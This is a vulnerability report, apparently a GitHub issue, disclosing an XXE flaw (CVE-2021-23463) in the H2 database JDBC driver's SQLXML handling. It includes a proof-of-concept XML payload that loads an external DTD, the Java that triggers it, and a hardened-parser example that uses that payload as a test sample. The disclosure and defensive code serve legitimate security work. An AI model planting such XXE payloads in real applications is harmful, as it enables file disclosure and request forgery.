CVE-2021-23463: Report a H2-Database-Engine SQLXML XXE vulnerability · Issue #3195 · h2database/h2database

Versions of the package com.h2database:h2 from 0 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object when it receives parsed string data from the org.h2.jdbc.JdbcResultSet.getSQLXML() method. Calling its getSource() method with DOMSource.class as the parameter triggers the vulnerability.


Hello, I am threedr3am of SecCoder Security Lab ([email protected]).

We found a security vulnerability (SCSL-2021-1001) in the H2-Database-Engine jar: when this component is used to connect to the h2 database, the returned data content field is parsed through SQLXML, which causes a client-side XXE (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).

  • Oracle MySQL JDBC also recently fixed a similar security vulnerability; please refer to: https://nvd.nist.gov/vuln/detail/CVE-2021-2471
  • This is their fix commit: mysql/mysql-connector-j@4993d57

Vulnerability detail:

When analyzing the data returned by the database, the org.h2.jdbc.JdbcResultSet class provides the getSQLXML(java.lang.String) method, which parses the string data into an object of the org.h2.jdbc.JdbcSQLXML class.


When the object's getSource(Class sourceClass) method is called with DOMSource.class as the input parameter, the XML is parsed without any protection against external entities, resulting in XXE.


Vulnerability reproduction:

  1. The table exists in the database

    create table tb_test ( id bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT 'primary key id', message text COMMENT 'SQLXML', PRIMARY KEY (id) );

  2. There is data in the tb_test table

    insert into tb_test(message) values('<?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY % remote SYSTEM "http://127.0.0.1:80/xxe.dtd"> %remote; ]>');

  3. Query the database to return the message field and parse it through SQLXML

    Statement statement = connection.createStatement();
    statement.execute("select * from tb_test");
    ResultSet resultSet = statement.getResultSet();
    while (resultSet.next()) {
        SQLXML sqlxml = resultSet.getSQLXML("message");
        // Requesting a DOMSource makes JdbcSQLXML parse the column value with an unhardened DOM parser
        sqlxml.getSource(DOMSource.class);
    }

  4. Result
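The report shows the column value being handed to an unhardened DOM parser inside JdbcSQLXML.getSource(DOMSource.class); besides upgrading to a fixed h2 release, an application that must parse XML read from a result set can do so itself with a parser locked down per the OWASP XXE-prevention guidance. The following is an added example, not code from the h2 project or from the report: the class name, both sample documents and the placeholder DTD URL are constructed for illustration, and the parser features used are the standard JDK/Xerces ones.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedSqlXmlParsing {

    // Factory that refuses DOCTYPE declarations and never resolves external entities or DTDs.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Rejecting the DOCTYPE outright blocks both general and parameter entities.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a parser implementation ignores the feature above.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Parse XML text fetched from a column (e.g. via ResultSet.getString()) instead of
    // letting JdbcSQLXML.getSource(DOMSource.class) parse it for us.
    static Document parseUntrustedXml(String xml) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        // Resolve every external reference to an empty document, so nothing touches network or disk.
        db.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
        return db.parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample in the shape of the report's payload; the DTD URL is a placeholder.
        String hostile = "<?xml version=\"1.0\"?><!DOCTYPE note [<!ENTITY % remote SYSTEM "
                + "\"http://dtd.example.invalid/xxe.dtd\"> %remote;]><note/>";
        String benign = "<?xml version=\"1.0\"?><note><to>ops</to></note>";

        System.out.println("benign root: " + parseUntrustedXml(benign).getDocumentElement().getNodeName());
        try {
            parseUntrustedXml(hostile);
            System.out.println("UNEXPECTED: hostile document parsed");
        } catch (SAXException e) {
            // Expected path: the DOCTYPE is rejected before any entity could be resolved.
            System.out.println("rejected hostile document: " + e.getMessage());
        }
    }
}
```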
